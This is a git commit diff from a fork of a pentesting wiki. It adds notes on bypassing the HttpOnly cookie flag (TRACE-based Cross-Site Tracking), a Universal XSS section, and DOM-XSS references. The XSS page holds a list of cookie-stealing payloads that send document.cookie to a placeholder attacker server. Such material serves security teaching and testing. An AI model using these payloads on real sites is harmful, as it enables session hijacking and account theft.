coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GitBook: [master] 472 pages modified

Browse Source
This commit is contained in:
CPol 2021-05-27 11:59:23 +00:00 committed by gitbook-bot
parent 5f83c0bdad
commit e765a981c7
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
3 changed files with 30 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
pentesting-web/hacking-with-cookies.md
View File

@ -119,6 +119,12 @@ A cookie with _**SameSite**_ attribute will **mitigate CSRF attacks** where a lo
This avoids the **client** to access the cookie \(Via **Javascript** for example: `document.cookie`\)
#### **Bypasses**
* This could be Bypassed with **TRACE** **HTTP** requests as the response from the server \(if this HTTP method is available\) will reflect the cookies sent. This technique is called **Cross-Site Tracking**.
* This technique is avoided by **modern browsers by not permitting sending a TRACE** request from JS. However, some bypassed to this have been found in specific software like sending `\r\nTRACE` instead of `TRACE` to IE6.0 SP2.
* Another way is the exploitation of zero/day vulnerabilities of the browsers.
### Secure
The request will **only** send the cookie in an HTTP request only if the request is transmitted over a secure channel \(typically **HTTPS**\).

21
pentesting-web/xss-cross-site-scripting/README.md
View File

@ -67,6 +67,17 @@ In this case your input is reflected between **`<script> [...] </script>`** tags
There is **JS code** that is using **unsafely** some **data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.
{% page-ref page="dom-xss.md" %}
### **Universal XSS**
These kind of XSS can be found **anywhere**. They not depend just on the client exploitation of a web application but on **any** **context**. These kind of **arbitrary JavaScript execution** can even be abuse to obtain **RCE**, **read** **arbitrary** **files** in clients and servers, and more.
Some **examples**:
{% page-ref page="server-side-xss-dynamic-pdf.md" %}
{% page-ref page="../../pentesting/pentesting-web/xss-to-rce-electron-desktop-apps.md" %}
## WAF bypass encoding image
![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/eaubb2ex0aerank.jpg)
@ -484,7 +495,10 @@ Remember to look into what is already loaded! jQuery is an easy example, but any
## **DOM vulnerabilities**
There is **JS code** that is using **unsafely data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.
**Due to the extension of the explanation of** [**DOM vulnerabilities it was moved to this page**](dom-xss.md)**.**
**Due to the extension of the explanation of** [**DOM vulnerabilities it was moved to this page**](dom-xss.md)**:**
{% page-ref page="dom-xss.md" %}
There you will find a detailed **explanation of what DOM vulnerabilities are, how are they provoked, and how to exploit them**.
Also, don't forget that **at the end of the mentioned post** you can find an explanation about [**DOM Clobbering attacks**](dom-xss.md#dom-clobbering).
@ -592,6 +606,7 @@ Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location
<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
@ -609,6 +624,10 @@ Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>
```
{% hint style="info" %}
You **won't be able to access the cookies from JavaScript** if the HTTPOnly flag is set in the cookie. But here you have [some ways to bypass this protection](../hacking-with-cookies.md#httponly) if you are lucky enough.
{% endhint %}
### Port Scanner \(fetch\)
```javascript

4
pentesting-web/xss-cross-site-scripting/dom-xss.md
View File

@ -12,6 +12,10 @@
Fundamentally, DOM-based vulnerabilities arise when a website **passes data from a source to a sink**, which then handles the data in an unsafe way in the context of the client's session.
{% hint style="info" %}
**You can find a more updated list of sources and sinks in** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki)\*\*\*\*
{% endhint %}
**Common sources:**
```javascript